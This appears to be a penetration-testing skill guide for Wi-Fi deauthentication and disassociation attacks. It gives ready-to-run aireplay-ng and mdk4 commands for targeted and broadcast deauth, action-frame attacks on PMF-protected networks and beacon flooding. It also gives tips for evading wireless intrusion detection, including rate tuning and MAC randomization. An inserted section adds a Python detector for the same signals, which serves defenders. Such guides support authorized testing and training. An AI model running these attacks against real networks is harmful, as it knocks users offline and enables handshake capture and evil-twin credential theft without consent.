| name | offensive-deauth-disassoc |
| description | Deauthentication and disassociation attacks against 802.11 networks — targeted single-client deauth for handshake capture, broadcast deauth for DoS (with authorization), action-frame attacks bypassing 802.11w (PMF), beacon flooding, mdk4 / aireplay-ng tooling, and rate-limit / PMF-aware operation. Use to coerce client reconnection (handshake capture, evil-twin roaming), as targeted DoS, or to test PMF posture. |
# Deauth / Disassoc Attacks
The most-used 802.11 management-frame attack: send a forged deauthentication or disassociation frame as the AP, and the client disconnects. Modern PMF (802.11w) authenticates these frames cryptographically — but most consumer and many enterprise deployments still don't require PMF.
## Quick Workflow
- Identify target client + AP (BSSID, channel)
- Pick deauth scope: single client (quiet) vs. broadcast (loud, DoS)
- Verify PMF status — if required, classic deauth fails; pivot to action-frame attacks
- Send the deauth burst at the right rate
## Single-Client Deauth (Preferred)
Used to force handshake capture, push a client to an evil twin, or test reconnection behavior.
```bash
sudo aireplay-ng --deauth 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c 11:22:33:44:55:66 \
  wlan0mon
```
`--deauth 5` sends 5 deauths (10 frames: 5 to the AP, 5 to the client).
- 3–10 is usually enough.
- More than 30 in a burst is unnecessarily noisy.
## Broadcast Deauth (DoS, Use Sparingly)
```bash
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
sudo mdk4 wlan0mon d -B target_bssids.txt -c 1,6,11
```
Only with explicit authorization. Continuous broadcast deauth is a clear DoS signal and trips most WIPS within seconds.
## PMF (802.11w) Awareness
PMF authenticates deauth/disassoc frames. Status is visible in the beacon's RSN capabilities:
```bash
sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>
```
| PMF Status | Deauth Effect |
|---|---|
| Off | Classic deauth works |
| Capable (optional) | Works against clients without PMF, fails against PMF-enabled clients |
| Required | Classic deauth ignored; must use action-frame attacks |
## Action-Frame Attacks Against PMF
PMF protects deauth/disassoc but doesn't always protect all action frames. Specific action types remain exploitable:
```bash
sudo mdk4 wlan0mon a -a <BSSID>
sudo mdk4 wlan0mon m -t <BSSID>
sudo mdk4 wlan0mon w -t <BSSID>
```
Action frames the IEEE 802.11 spec marks as "may be unprotected" include some block-ack and channel-switch announcements — implementation-specific exploitation paths exist but require chipset-specific testing.
## Beacon Flooding
Confuse clients (and WIPS) by flooding fake beacons:
```bash
sudo mdk4 wlan0mon b -f beacon_essids.txt -c 6 -s 100
```
Use cases:
- Hide your evil twin among noise
- Stress-test client roaming logic
- DoS WIPS dashboards (flood with thousands of fake APs)
## Rate Tuning and Detection
| Burst | Defender Signal |
|---|---|
| 3–10 deauth, single client | Often misclassified as roaming or RF noise |
| >30 deauth/sec from one source | WIPS rule trips |
| Continuous broadcast deauth | Clear DoS; alert + ticket within minutes |
| Beacon flood >50/sec | Saturates WIPS dashboards |
Randomize source MAC across burst-and-pause cycles to spread the signal.
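The defender's side of the table above, added here as an example that is not from the original page or from any WIPS product: it runs constructed frame observations through the table's thresholds. The frame tuple format, the 1-second window, the "three consecutive windows" reading of continuous, and counting beacons by distinct BSSID are assumptions of this example.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed frame observations (time_s, subtype, src_mac, dst_mac), the kind
# a monitor-mode sensor would emit. All values are made up for this example.
SAMPLE = (
    # 5 targeted deauths within one second, AP BSSID -> one client
    [(i * 0.1, "deauth", "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66") for i in range(5)]
    # broadcast deauth at 50/s sustained across three consecutive seconds
    + [(10.0 + i * 0.02, "deauth", "aa:bb:cc:dd:ee:ff", BROADCAST) for i in range(150)]
    # beacon flood: 80 distinct fake BSSIDs within one second
    + [(20.0 + i * 0.01, "beacon", "02:00:00:00:00:%02x" % i, BROADCAST) for i in range(80)]
)

def detect(frames, window_s=1.0, continuous_windows=3):
    """Apply the table's thresholds and return (severity, detail) findings.
    "Continuous" broadcast deauth is approximated as broadcast deauths present in
    `continuous_windows` consecutive windows (an assumption of this example)."""
    deauth_rate = defaultdict(lambda: defaultdict(int))  # src -> window -> count
    unicast = defaultdict(int)                           # (src, dst) -> count
    bcast_windows = defaultdict(set)                     # src -> windows with bcast deauth
    beacon_srcs = defaultdict(set)                       # window -> distinct BSSIDs seen
    for t, subtype, src, dst in frames:
        w = int(t // window_s)
        if subtype == "deauth":
            deauth_rate[src][w] += 1
            if dst == BROADCAST:
                bcast_windows[src].add(w)
            else:
                unicast[(src, dst)] += 1
        elif subtype == "beacon":
            beacon_srcs[w].add(src)  # distinct BSSIDs, so dense legit sites don't trip
    findings = []
    for src, per_window in deauth_rate.items():
        if max(per_window.values()) > 30:
            findings.append(("high", f"{src}: >30 deauth/s from one source"))
        wins = sorted(bcast_windows[src])
        for i in range(len(wins) - continuous_windows + 1):
            if wins[i + continuous_windows - 1] - wins[i] == continuous_windows - 1:
                findings.append(("critical", f"{src}: continuous broadcast deauth (DoS)"))
                break
    for (src, dst), n in unicast.items():
        if 3 <= n <= 10:
            findings.append(("low", f"{src} -> {dst}: {n} targeted deauths, could be roaming"))
    for w, srcs in beacon_srcs.items():
        if len(srcs) > 50:
            findings.append(("high", f"window {w}: {len(srcs)} distinct beacon BSSIDs (flood)"))
    return findings
```

`detect(SAMPLE)` yields one finding per row of the table, with the targeted 5-frame burst scored low because, on its own, it is indistinguishable from a roaming event.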
## Engagement Cheatsheet
```bash
sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>                 # survey target, read PMF status
sudo aireplay-ng --deauth 3 -a <BSSID> -c <client> wlan0mon      # single-client deauth
sudo mdk4 wlan0mon a -a <BSSID>                                   # mdk4 a mode (PMF-required targets)
sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon                   # broadcast deauth (DoS, authorized only)
```
## Reporting
Document for each test:
- Target BSSID + ESSID + PMF status
- Burst size, duration
- Effect observed (client reconnected? handshake captured? DoS achieved?)
- Detection signals defender would have seen
## Key References